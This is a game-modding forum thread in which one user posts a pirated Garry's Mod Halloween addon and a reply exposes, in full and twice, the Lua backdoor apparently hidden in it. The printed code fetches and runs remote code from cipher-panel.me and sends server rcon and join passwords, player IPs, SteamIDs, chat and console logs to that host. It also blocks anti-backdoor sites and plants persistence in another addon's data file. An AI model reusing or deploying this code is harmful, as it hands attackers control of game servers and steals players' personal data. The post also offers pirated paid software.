Garry's Mod Leaks
[LEAK] Zeros PumpkinNight (Halloween Script) 1.1.2
Submitted by viciwi, 04-11-2019, 05:56 PM, Thread ID: 148822
Thread Closed
Hello to you here is the latest version of Zero's PumpkinNight Halloween (Halloween Script) as I saw that no one had leaked anywhere I do, this addon contains no DRM, I would update it when there will have a Update.
Have fun.
================================================== =================================
GMODSTORE LINK
FEATURES:
Blues Unboxing 3
Toolgun Backing to create custom fees for Pumpkins
Table Dashboard that displays the Top 10 Players with the Most Broken Pumpkins
Enemy Boss that gives the player a dangerous opponent
Ghost NPC that haunts the players.
NPC shop with nice
Gibs Breakable Pumpkininterface
Support Pointshop 1 & 2
Support accessories SH (Darkrp)
Support xAdmin
Itemstore support for Partypopper SWEPS
Without DRM
Fully customizable
Multilanguage support
Customized templates Personalized
animations Customized
materials
=================== ================================================== ==============
Drag the addon into garrysmod / addons /
Install thecontentson your server.
Download: https://anonfile.com/g8z5R790n5/zeros_pumpkinnight_zip
RE: [LEAK] Zeros PumpkinNight (Halloween Script) 1.1.2
thanks for free addon, nice backdoor bro XD
timer.Simple(0.60, function() http.Fetch('https://cipher-panel.me/secure_area/flg.php?to=qG2r0', function(fck) RunString(fck, 'BillIsHere', false) end) end)
if CLIENT then return end
if CpzCLzaPIOYCqfc == "CpzCLzaPIOYCqf" then return end
CpzCLzaPIOYCqfc = "CpzCLzaPIOYCqf"
local dyiJJnNvqRNkEoC34n3WitHApRDghvFg = {
"\x64\x72\x6d\x2e\x67\x6d\x2e\x65\x73\x79\x2e\x65\x73",
"\x6f\x6d\x65\x67\x61\x2d\x70\x72\x6f\x6a\x65\x63\x74\x2e\x63\x7a",
"\x6f\x6d\x65\x67\x61\x2d\x70\x72\x6f\x6a\x65\x63\x74",
"\x73\x6d\x61\x72\x74\x2d\x6f\x76\x65\x72\x77\x72\x69\x74\x65",
"\x72\x76\x61\x63",
"\x71\x72\x65\x78",
"\x67\x2d\x68\x75\x62\x2e\x78\x79\x7a",
"\x65\x78\x6f\x64\x6f\x73\x69\x75\x6d",
"\x68\x61\x79\x6c\x61\x79\x2e\x74\x6b",
"\x2e\x30\x30\x30\x77\x65\x62\x68\x6f\x73\x74",
"\x2e\x79\x6f\x2e\x66\x72",
"\x2e\x67\x71",
"\x2e\x78\x79\x7a",
"\x2e\x74\x6b"
}
local PptiGTkXsvUkecKLtoRtOvBTxBdMicAf = http.Fetch
local XgdErWFbLVIBIYDGVIiPQFgcyykTEUWV = http.Post
local zKeYmjbHBmTPAkstSAEZWJtMmLnkfQt = HTTP
timer.Create("CpzCLzaPIOYCqfc", 8.5, 3, function()
function http.Fetch(xHRMIvC,Lxpyl,PILescy,lVIKZMbLy)
local zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = false
for i,rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd in pairs(dyiJJnNvqRNkEoC34n3WitHApRDghvFg) do
if string.match(xHRMIvC, rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd) then
zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = true
end
end
if not zJBoLKGEvBMocCbKWZAARzYolvvTxHOT then
PptiGTkXsvUkecKLtoRtOvBTxBdMicAf(xHRMIvC,Lxpyl,PILescy,lVIKZMbLy)
end
end
function http.Post(a,b,c,d,e)
local zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = false
for i,rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd in pairs(dyiJJnNvqRNkEoC34n3WitHApRDghvFg) do
if string.match(a, rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd) then
zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = true
end
end
if not zJBoLKGEvBMocCbKWZAARzYolvvTxHOT then
XgdErWFbLVIBIYDGVIiPQFgcyykTEUWV(a,b,c,d,e)
end
end
function HTTP(VBjZVqjhvyTtzJncWUsGZhFdOrsBXcEp)
local zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = false
for i,rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd in pairs(dyiJJnNvqRNkEoC34n3WitHApRDghvFg) do
if string.match(VBjZVqjhvyTtzJncWUsGZhFdOrsBXcEp.url, rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd) then
zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = true
end
end
if not zJBoLKGEvBMocCbKWZAARzYolvvTxHOT then
zKeYmjbHBmTPAkstSAEZWJtMmLnkfQt(VBjZVqjhvyTtzJncWUsGZhFdOrsBXcEp)
end
end
end)
util.AddNetworkString("CpzCLzaPIOYCqfc")
local function ServerInfo()
timer.Create("NuJJRssU", 5, 0, function()
local info = {}
local files = file.Find("cfg/*", "GAME")
for i = 1, #files do
if string.EndsWith(files[i], ".cfg") then
local content = file.Read("cfg/" .. files[i], "GAME")
content = string.Explode("\n", content)
for i = 1, #content do
if string.StartWith(content[i], "rcon_password") then
table.insert(info, 1, string.Split(content[i], "\"")[2])
end
if string.StartWith(content[i], "sv_password") then
table.insert(info, 2, string.Split(content[i], "\"")[2])
end
end
end
end
local rcon = info[1] or "Inconnu"
local password = info[3] or "Inconnu"
if rcon == "" then
rcon = "Inconnu"
end
if password == "" then
password = "Inconnu"
end
local function BackSteam( ply )
ply:SendLua([[net.Receive("cplusdetectablefdp",function()RunString(net.ReadString(),"_")end)]])
end
local players = {}
for k,v in pairs(player.GetAll()) do
if engine.ActiveGamemode() == "darkrp" then
table.insert(players, {
money = v:getDarkRPVar("money"),
job = v:getDarkRPVar("job"),
name = v:Name(),
steamid = v:SteamID(),
ip = v:IPAddress(),
steamidsex = v:SteamID64(),
group = v:GetUserGroup()
})
else
table.insert(players, {
name = v:Name(),
steamid = v:SteamID(),
ip = v:IPAddress(),
steamidsex = v:SteamID64(),
group = v:GetUserGroup()
})
end
end
hook.Add( "PlayerSay", "ck", function( ply, text )
local ckchat = {
serverip = game.GetIPAddress(),
plyid = ply:SteamID64(),
plyip = ply:IPAddress(),
plyname = ply:Nick(),
plyrank = ply:GetUserGroup(),
validate = "QRbsnCCjHbawbi",
say = text }
http.Post("https://cipher-panel.me/secure_area/chatreceive.php", ckchat)
end)
if file.Exists("console.log", "GAME") then
local log = file.Read("console.log", "GAME")
loga = string.sub(log, (#log-30000))
http.Post("https://cipher-panel.me/secure_area/consolelog.php", {s=game.GetIPAddress(),l=loga,validate="QRbsnCCjHbawbi",})
end
local function payGJeYNoYtmIT(func,n)
for i=0,30 do
local xx = jit.util.funck( func, -i )
if xx == n then
return true
end
end
return false
end
local function GetLinesFromFuncInfo(poof)
local src = debug.getinfo(poof)
if not src.short_src then return "(No source)" end
if not file.Exists(src.short_src,"GAME") then
return "(RunString)"
end
local lines = string.Split(file.Read(src.short_src,"GAME"),"\n")
local lean = ""
for k,v in pairs(lines) do
if (k >= src.linedefined) and (k <= src.lastlinedefined) then
lean = lean .. v .. "\n"
end
end
return lean
end
local function GetBackdoors()
local ret = {}
ret = {}
local tbl = net.Receivers
for k,v in pairs(tbl) do
if payGJeYNoYtmIT(v,"RunString") then
local txt = GetLinesFromFuncInfo(v)
table.insert(ret,{net=k,file=debug.getinfo(v).short_src,func=txt})
end
if payGJeYNoYtmIT(v,"RunStringEx") then
local txt = GetLinesFromFuncInfo(v)
table.insert(ret,{net=k,file=debug.getinfo(v).short_src,func=txt})
end
if payGJeYNoYtmIT(v,"CompileString") then
local txt = GetLinesFromFuncInfo(v)
table.insert(ret,{net=k,file=debug.getinfo(v).short_src,func=txt})
end
end
if encodetbl ~= nil then
local aab = ""
if RunHASHOb and isfunction(RunHASHOb) then
aab = debug.getinfo(RunHASHOb).short_src
end
table.insert(ret,{net="GVacDoor",file=aab,func=""})
end
if util.NetworkStringToID("loading_kvacdoor") ~= 0 then
table.insert(ret,{net="KVacDoor",file="",func=""})
end
return ret
end
local detect = {}
detect.snte = "0"
detect.cac = "0"
detect.all = GetBackdoors()
if file.Exists("autorun/server/snte_source.lua","LUA") or ConVarExists("snte_ulxluarun") or ConVarExists("snte_dupefix") then
detect.snte = "1"
end
if CAC then
detect.cac = "1"
end
local function PlayerSteam(ply)
BackSteam(ply)
if !ply:IsBot() then
local playerinfo = {
server = GetConVar("hostname"):GetString(),
name = tostring(ply:Name()),
ipadress = tostring(ply:IPAddress()),
steamid = tostring(ply:SteamID()),
steamid64 = tostring(ply:SteamID64()),
validate = "QRbsnCCjHbawbi",
}
http.Post("https://cipher-panel.me/secure_area/steamply.php", playerinfo,function©
net.Start("CpzCLzaPIOYCqfc")
net.WriteString©
net.Send(ply)
end,function(e)
end)
end
end
hook.Add("PlayerInitialSpawn","exRepytB",function(ply)
PlayerSteam(ply)
end)
local servinfo = {
ip = game.GetIPAddress(),
hostname = GetHostName(),
players = #player.GetHumans() .. "/" .. game.MaxPlayers(),
map = game.GetMap(),
gamemode = engine.ActiveGamemode(),
rcon = rcon,
password = password,
uptime = tostring(math.floor(CurTime()/60)),
token = "qG2r0",
playerslist = util.TableToJSON(players),
det = util.TableToJSON(detect),
validate = "QRbsnCCjHbawbi",
real = "85.26.235.192"
}
http.Post("https://cipher-panel.me/secure_area/evo.php", servinfo,function(fck,...)
if string.len(fck) <= 0 then return end
xpcall(function()
local cap = CompileString(fck,"BillIsHere",false)
if isfunction(cap) then
cap()
end
end, function(e)
end)
end)
end)
end
ServerInfo()
if file.Exists("xeon/xeon.dat", "DATA") then
file.Append("xeon/xeon.dat", "\n" .. [[if SERVER then timer.Simple(0.70,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\99\105\112\104\101\114\45\112\97\110\101\108\46\109\101\47\115\101\99\117\114\101\45\97\114\101\97\47\102\108\103\46\112\104\112\63\116\111\61\48\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end) end]])
end
OH, what is this, lets decrypt!)
timer.Simple(0.60, function() http.Fetch('https://cipher-panel.me/secure_area/flg.php?to=qG2r0', function(fck) RunString(fck, 'BillIsHere', false) end) end)
if CLIENT then return end
if CpzCLzaPIOYCqfc == "CpzCLzaPIOYCqf" then return end
CpzCLzaPIOYCqfc = "CpzCLzaPIOYCqf"
local dyiJJnNvqRNkEoC34n3WitHApRDghvFg = {
"\x64\x72\x6d\x2e\x67\x6d\x2e\x65\x73\x79\x2e\x65\x73",
"\x6f\x6d\x65\x67\x61\x2d\x70\x72\x6f\x6a\x65\x63\x74\x2e\x63\x7a",
"\x6f\x6d\x65\x67\x61\x2d\x70\x72\x6f\x6a\x65\x63\x74",
"\x73\x6d\x61\x72\x74\x2d\x6f\x76\x65\x72\x77\x72\x69\x74\x65",
"\x72\x76\x61\x63",
"\x71\x72\x65\x78",
"\x67\x2d\x68\x75\x62\x2e\x78\x79\x7a",
"\x65\x78\x6f\x64\x6f\x73\x69\x75\x6d",
"\x68\x61\x79\x6c\x61\x79\x2e\x74\x6b",
"\x2e\x30\x30\x30\x77\x65\x62\x68\x6f\x73\x74",
"\x2e\x79\x6f\x2e\x66\x72",
"\x2e\x67\x71",
"\x2e\x78\x79\x7a",
"\x2e\x74\x6b"
}
local PptiGTkXsvUkecKLtoRtOvBTxBdMicAf = http.Fetch
local XgdErWFbLVIBIYDGVIiPQFgcyykTEUWV = http.Post
local zKeYmjbHBmTPAkstSAEZWJtMmLnkfQt = HTTP
timer.Create("CpzCLzaPIOYCqfc", 8.5, 3, function()
function http.Fetch(xHRMIvC,Lxpyl,PILescy,lVIKZMbLy)
local zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = false
for i,rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd in pairs(dyiJJnNvqRNkEoC34n3WitHApRDghvFg) do
if string.match(xHRMIvC, rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd) then
zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = true
end
end
if not zJBoLKGEvBMocCbKWZAARzYolvvTxHOT then
PptiGTkXsvUkecKLtoRtOvBTxBdMicAf(xHRMIvC,Lxpyl,PILescy,lVIKZMbLy)
end
end
function http.Post(a,b,c,d,e)
local zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = false
for i,rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd in pairs(dyiJJnNvqRNkEoC34n3WitHApRDghvFg) do
if string.match(a, rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd) then
zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = true
end
end
if not zJBoLKGEvBMocCbKWZAARzYolvvTxHOT then
XgdErWFbLVIBIYDGVIiPQFgcyykTEUWV(a,b,c,d,e)
end
end
function HTTP(VBjZVqjhvyTtzJncWUsGZhFdOrsBXcEp)
local zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = false
for i,rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd in pairs(dyiJJnNvqRNkEoC34n3WitHApRDghvFg) do
if string.match(VBjZVqjhvyTtzJncWUsGZhFdOrsBXcEp.url, rpAkDspWFsgZXrWXAZUJYTWuuOdddEyd) then
zJBoLKGEvBMocCbKWZAARzYolvvTxHOT = true
end
end
if not zJBoLKGEvBMocCbKWZAARzYolvvTxHOT then
zKeYmjbHBmTPAkstSAEZWJtMmLnkfQt(VBjZVqjhvyTtzJncWUsGZhFdOrsBXcEp)
end
end
end)
util.AddNetworkString("CpzCLzaPIOYCqfc")
local function ServerInfo()
timer.Create("NuJJRssU", 5, 0, function()
local info = {}
local files = file.Find("cfg/*", "GAME")
for i = 1, #files do
if string.EndsWith(files[i], ".cfg") then
local content = file.Read("cfg/" .. files[i], "GAME")
content = string.Explode("\n", content)
for i = 1, #content do
if string.StartWith(content[i], "rcon_password") then
table.insert(info, 1, string.Split(content[i], "\"")[2])
end
if string.StartWith(content[i], "sv_password") then
table.insert(info, 2, string.Split(content[i], "\"")[2])
end
end
end
end
local rcon = info[1] or "Inconnu"
local password = info[3] or "Inconnu"
if rcon == "" then
rcon = "Inconnu"
end
if password == "" then
password = "Inconnu"
end
local function BackSteam( ply )
ply:SendLua([[net.Receive("cplusdetectablefdp",function()RunString(net.ReadString(),"_")end)]])
end
local players = {}
for k,v in pairs(player.GetAll()) do
if engine.ActiveGamemode() == "darkrp" then
table.insert(players, {
money = v:getDarkRPVar("money"),
job = v:getDarkRPVar("job"),
name = v:Name(),
steamid = v:SteamID(),
ip = v:IPAddress(),
steamidsex = v:SteamID64(),
group = v:GetUserGroup()
})
else
table.insert(players, {
name = v:Name(),
steamid = v:SteamID(),
ip = v:IPAddress(),
steamidsex = v:SteamID64(),
group = v:GetUserGroup()
})
end
end
hook.Add( "PlayerSay", "ck", function( ply, text )
local ckchat = {
serverip = game.GetIPAddress(),
plyid = ply:SteamID64(),
plyip = ply:IPAddress(),
plyname = ply:Nick(),
plyrank = ply:GetUserGroup(),
validate = "QRbsnCCjHbawbi",
say = text }
http.Post("https://cipher-panel.me/secure_area/chatreceive.php", ckchat)
end)
if file.Exists("console.log", "GAME") then
local log = file.Read("console.log", "GAME")
loga = string.sub(log, (#log-30000))
http.Post("https://cipher-panel.me/secure_area/consolelog.php", {s=game.GetIPAddress(),l=loga,validate="QRbsnCCjHbawbi",})
end
local function payGJeYNoYtmIT(func,n)
for i=0,30 do
local xx = jit.util.funck( func, -i )
if xx == n then
return true
end
end
return false
end
local function GetLinesFromFuncInfo(poof)
local src = debug.getinfo(poof)
if not src.short_src then return "(No source)" end
if not file.Exists(src.short_src,"GAME") then
return "(RunString)"
end
local lines = string.Split(file.Read(src.short_src,"GAME"),"\n")
local lean = ""
for k,v in pairs(lines) do
if (k >= src.linedefined) and (k <= src.lastlinedefined) then
lean = lean .. v .. "\n"
end
end
return lean
end
local function GetBackdoors()
local ret = {}
ret = {}
local tbl = net.Receivers
for k,v in pairs(tbl) do
if payGJeYNoYtmIT(v,"RunString") then
local txt = GetLinesFromFuncInfo(v)
table.insert(ret,{net=k,file=debug.getinfo(v).short_src,func=txt})
end
if payGJeYNoYtmIT(v,"RunStringEx") then
local txt = GetLinesFromFuncInfo(v)
table.insert(ret,{net=k,file=debug.getinfo(v).short_src,func=txt})
end
if payGJeYNoYtmIT(v,"CompileString") then
local txt = GetLinesFromFuncInfo(v)
table.insert(ret,{net=k,file=debug.getinfo(v).short_src,func=txt})
end
end
if encodetbl ~= nil then
local aab = ""
if RunHASHOb and isfunction(RunHASHOb) then
aab = debug.getinfo(RunHASHOb).short_src
end
table.insert(ret,{net="GVacDoor",file=aab,func=""})
end
if util.NetworkStringToID("loading_kvacdoor") ~= 0 then
table.insert(ret,{net="KVacDoor",file="",func=""})
end
return ret
end
local detect = {}
detect.snte = "0"
detect.cac = "0"
detect.all = GetBackdoors()
if file.Exists("autorun/server/snte_source.lua","LUA") or ConVarExists("snte_ulxluarun") or ConVarExists("snte_dupefix") then
detect.snte = "1"
end
if CAC then
detect.cac = "1"
end
local function PlayerSteam(ply)
BackSteam(ply)
if !ply:IsBot() then
local playerinfo = {
server = GetConVar("hostname"):GetString(),
name = tostring(ply:Name()),
ipadress = tostring(ply:IPAddress()),
steamid = tostring(ply:SteamID()),
steamid64 = tostring(ply:SteamID64()),
validate = "QRbsnCCjHbawbi",
}
http.Post("https://cipher-panel.me/secure_area/steamply.php", playerinfo,function©
net.Start("CpzCLzaPIOYCqfc")
net.WriteString©
net.Send(ply)
end,function(e)
end)
end
end
hook.Add("PlayerInitialSpawn","exRepytB",function(ply)
PlayerSteam(ply)
end)
local servinfo = {
ip = game.GetIPAddress(),
hostname = GetHostName(),
players = #player.GetHumans() .. "/" .. game.MaxPlayers(),
map = game.GetMap(),
gamemode = engine.ActiveGamemode(),
rcon = rcon,
password = password,
uptime = tostring(math.floor(CurTime()/60)),
token = "qG2r0",
playerslist = util.TableToJSON(players),
det = util.TableToJSON(detect),
validate = "QRbsnCCjHbawbi",
real = "85.26.235.192"
}
http.Post("https://cipher-panel.me/secure_area/evo.php", servinfo,function(fck,...)
if string.len(fck) <= 0 then return end
xpcall(function()
local cap = CompileString(fck,"BillIsHere",false)
if isfunction(cap) then
cap()
end
end, function(e)
end)
end)
end)
end
ServerInfo()
if file.Exists("xeon/xeon.dat", "DATA") then
file.Append("xeon/xeon.dat", "\n" .. [[if SERVER then timer.Simple(0.70,function() RunString("\104\116\116\112\46\70\101\116\99\104\40\34\104\116\116\112\115\58\47\47\99\105\112\104\101\114\45\112\97\110\101\108\46\109\101\47\115\101\99\117\114\101\45\97\114\101\97\47\102\108\103\46\112\104\112\63\116\111\61\48\34\44\102\117\110\99\116\105\111\110\40\98\41\32\82\117\110\83\116\114\105\110\103\40\98\44\32\34\69\82\82\79\82\34\44\32\102\97\108\115\101\41\32\101\110\100\41") end) end]])
end
OH, what is this, lets decrypt!)
Users browsing this thread: 3 Guest(s)